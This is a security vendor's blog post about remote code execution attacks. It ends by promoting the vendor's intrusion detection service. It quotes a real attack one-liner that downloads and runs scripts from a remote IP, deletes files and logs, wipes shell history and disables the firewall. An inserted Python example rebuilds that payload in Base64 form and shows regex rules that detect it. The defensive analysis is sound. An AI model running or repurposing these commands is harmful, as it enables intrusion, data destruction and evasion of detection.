Exploiting RCE (Remote Code Execution) vulnerabilities: the nightmare of antivirus, EDR and SIEM.

New RCE (Remote Code Execution) security vulnerabilities are reported regularly (e.g. CVE-2023-27997 in Fortigate SSL VPN, CVE-2021-31207 ProxyShell, CVE-2021-34527 PrintNightmare, etc.).

They are very often rated critical, and almost all make the headlines; some, such as ProxyShell, PrintNightmare and MS17-010 EternalBlue, have been highly publicized.

What makes these types of attacks more dangerous than others? How can we protect ourselves against these attacks?

What is a RCE vulnerability?

Remote code execution (RCE) is a type of attack in which the attacker sends commands to a target over the network. The target machine executes those commands as if the attacker were logged on to it. This is achieved by exploiting an existing vulnerability on the target.

Generally, the vulnerability exploited is zero-day (unknown), which greatly increases the number of potential victims. As an example, in 2017 the exploitation of the MS17-010 EternalBlue vulnerability to distribute the Wannacry ransomware infected over 200,000 computers in 3 days. Believe it or not, we're still finding this critical vulnerability in networks in 2023!

Consequences of exploiting an RCE vulnerability

The consequences of exploiting an RCE vulnerability vary widely. Here are just a few examples:

  • Introducing ransomware on the attacked target, which can then spread throughout the network.
  • Accessing confidential data.
  • Maliciously modifying data required for processing (which can have serious consequences, depending on the domain).
  • Exfiltrating data from the target.
  • Giving the attacker permanent remote access, with administrator rights.
  • Shutting down the target or causing malfunctions.

RCE vulnerability exploit codes give antivirus, EDR and SIEM the runaround

In some of the attacks we've seen in the field, RCE vulnerability exploit code is able to remotely shut down the antivirus or EDR, before executing its payload (shellcode).

Given that exploit code can remotely shut down the security tools on your machines, you should assume that an antivirus or EDR alone does not fully protect you against the exploitation of RCE vulnerabilities. Nor are SIEMs well suited to detecting RCE attacks.

Using obfuscation techniques to bypass security tools

To make the code used to exploit RCE vulnerabilities difficult to detect, hackers often use obfuscation techniques (e.g. Base64 encoding) to hide the true nature of the code. Security tools that cannot decode obfuscated content will not be able to detect it.

Example of RCE malicious code in plain text (real case):

AA..AAAA cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.163.47.189/xb.sh; curl -O http://185.163.47.189/xb.sh; chmod 777 xb.sh; sh xb.sh; tftp 185.163.47.189 -c get xb.sh; chmod 777 xb.sh; sh xb.sh; tftp -r xb2.sh -g 185.163.47.189; chmod 777 xb2.sh; sh xb2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.163.47.189 xb1.sh xb1.sh; sh xb1.sh; rm -rf xb.sh xb.sh xb2.sh xb1.sh; rm -rf *; rm -rf /var/log/wtmp; rm -rf ~/.bash_history; rm -rf /bin/netstat; history -w; service iptables stop; /sbin/iptables -F;/sbin/iptables -X; ulimit -n 999999;ulimit -u 999999; history -c; history -w

When the malicious code runs, it downloads another malicious script called xb.sh from a remote malicious host (http://185.163.47[.]189). The malicious code then gives full rights to the xb.sh script (chmod 777 xb.sh), executes the script, stops the firewall on the target server (service iptables stop) and flushes its rules (iptables -F), and so on. After execution, the malicious code deletes itself (rm -rf xb.sh) and wipes the shell history, erasing all traces of its presence. And all this without the need to authenticate on the victim server. Impressive!

Such malicious code can be detected by analyzing its content (e.g. matching patterns such as the firewall shutdown command service iptables stop, the download-and-execute chain, or the history wipe).

The same malicious code in obfuscated form (in base64) to make it undetectable

The obfuscated version of the malicious code becomes very difficult to detect.
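To make the point concrete, here is an added example (not code from the article, and not Streamscan's CDS) of content analysis run over a payload like the one above. It goes a little beyond the article: it peels nested Base64 layers, not just one. The sample payload is constructed here, modelled on the plain-text payload quoted above (same commands, same download host); the indicator regexes and the function names are hypothetical, written for this example. Every rule requires literal whitespace, which a Base64 blob never contains, so naive matching misses the encoded form until it is decoded.

```python
import base64
import re

# Constructed sample, modelled on the plain-text payload quoted in this article
# (same commands and the same download host); it is not a live capture.
PLAIN_PAYLOAD = (
    "cd /tmp || cd /var/run || cd /; wget http://185.163.47.189/xb.sh; "
    "chmod 777 xb.sh; sh xb.sh; service iptables stop; /sbin/iptables -F; "
    "rm -rf xb.sh; rm -rf ~/.bash_history; history -c; history -w"
)

# The same payload wrapped the way the article describes: Base64-encoded and
# piped through a decoder into a shell. Built here from PLAIN_PAYLOAD.
OBFUSCATED_PAYLOAD = "echo {} | base64 -d | sh".format(
    base64.b64encode(PLAIN_PAYLOAD.encode("utf-8")).decode("ascii")
)

# Hypothetical content-matching rules for the behaviours described above.
# Every rule needs literal whitespace, which a Base64 blob never contains,
# so none of them can fire on the encoded form without decoding it first.
INDICATORS = [
    ("firewall-disable", re.compile(r"\b(service\s+iptables\s+stop|iptables\s+-[FX])\b")),
    ("download-and-execute", re.compile(r"\b(wget|curl|tftp|ftpget)\b.*?\bsh\s+\S+\.sh\b")),
    ("world-writable-script", re.compile(r"\bchmod\s+777\s+\S+")),
    ("history-wipe", re.compile(r"(rm\s+-rf\s+~/\.bash_history|history\s+-[cw])")),
    ("self-delete", re.compile(r"\brm\s+-rf\s+\S+\.sh\b")),
]

# A run of Base64 alphabet characters long enough to be worth decoding.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def _looks_like_text(s):
    """True if a decoded blob is printable text (allowing newlines and tabs)."""
    return all(c.isprintable() or c in "\n\t" for c in s)


def decode_base64_layers(text, max_depth=3):
    """Return the input plus every decodable Base64 blob found in it, peeling
    up to max_depth nested layers. Blobs that fail to decode, or that decode
    to binary rather than text, are skipped rather than raising."""
    layers = [text]
    frontier = [text]
    for _ in range(max_depth):
        next_frontier = []
        for chunk in frontier:
            for blob in B64_BLOB.findall(chunk):
                try:
                    decoded = base64.b64decode(blob, validate=True).decode("utf-8")
                except (ValueError, UnicodeDecodeError):
                    continue
                if _looks_like_text(decoded):
                    layers.append(decoded)
                    next_frontier.append(decoded)
        if not next_frontier:
            break
        frontier = next_frontier
    return layers


def scan_without_decoding(text):
    """Naive content analysis: match the rules against the raw text only."""
    return sorted(label for label, rule in INDICATORS if rule.search(text))


def scan(text):
    """Content analysis that first peels Base64 layers, then matches the rules
    on every layer. Returns the sorted list of indicator labels that fired."""
    hits = set()
    for layer in decode_base64_layers(text):
        for label, rule in INDICATORS:
            if rule.search(layer):
                hits.add(label)
    return sorted(hits)


if __name__ == "__main__":
    print("plain, no decoding:     ", scan_without_decoding(PLAIN_PAYLOAD))
    print("obfuscated, no decoding:", scan_without_decoding(OBFUSCATED_PAYLOAD))
    print("obfuscated, with decode:", scan(OBFUSCATED_PAYLOAD))
```

Run as a script, the first call reports all five indicators, the second reports none, and the third reports the same five as the first once the Base64 layer is decoded. Base64 is only one wrapper; the same approach applies to any encoding the inspecting tool knows how to reverse, which is why a network-level tool that decodes content before matching sees what a raw string match misses.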

Tools and measures that do not protect against the exploitation of RCE vulnerabilities

The following measures will not protect you from the exploitation of RCE vulnerabilities:

Tools and measures to protect against the exploitation of RCE vulnerabilities

The tools that protect against RCE attacks operate at the network perimeter; SIEMs are excluded here because their intrusion detection capabilities are very basic.

Appropriate tools are:

  • Intrusion detection and prevention systems (IDS/IPS/NDR), such as Streamscan's CDS, to detect shellcodes/webshells.
  • Application firewalls (WAF) to detect webshells.

In addition to these tools, good cybersecurity hygiene helps reduce risks. Here are some recommendations:

  • Security vulnerability management: correct RCE vulnerabilities quickly, as soon as they are reported.
  • Attack surface reduction: limit the exposure of your servers to the strict minimum necessary. Don't expose a server to the Internet if you don't have to.
  • Server hardening to reinforce security.
  • 24/7 network security monitoring.

How can Streamscan help?

Cyber attacks are exploding all the time. Without continuous security monitoring, you're completely blind to the attacks targeting you. You can't defend against what you can't see.

Let us put our eyes on your network. Join our MDR managed monitoring platform powered by our IDS/IPS named CDS and protect yourself from cyberattacks.


Contact us at +1 877 208-9040 or talk to one of our experts.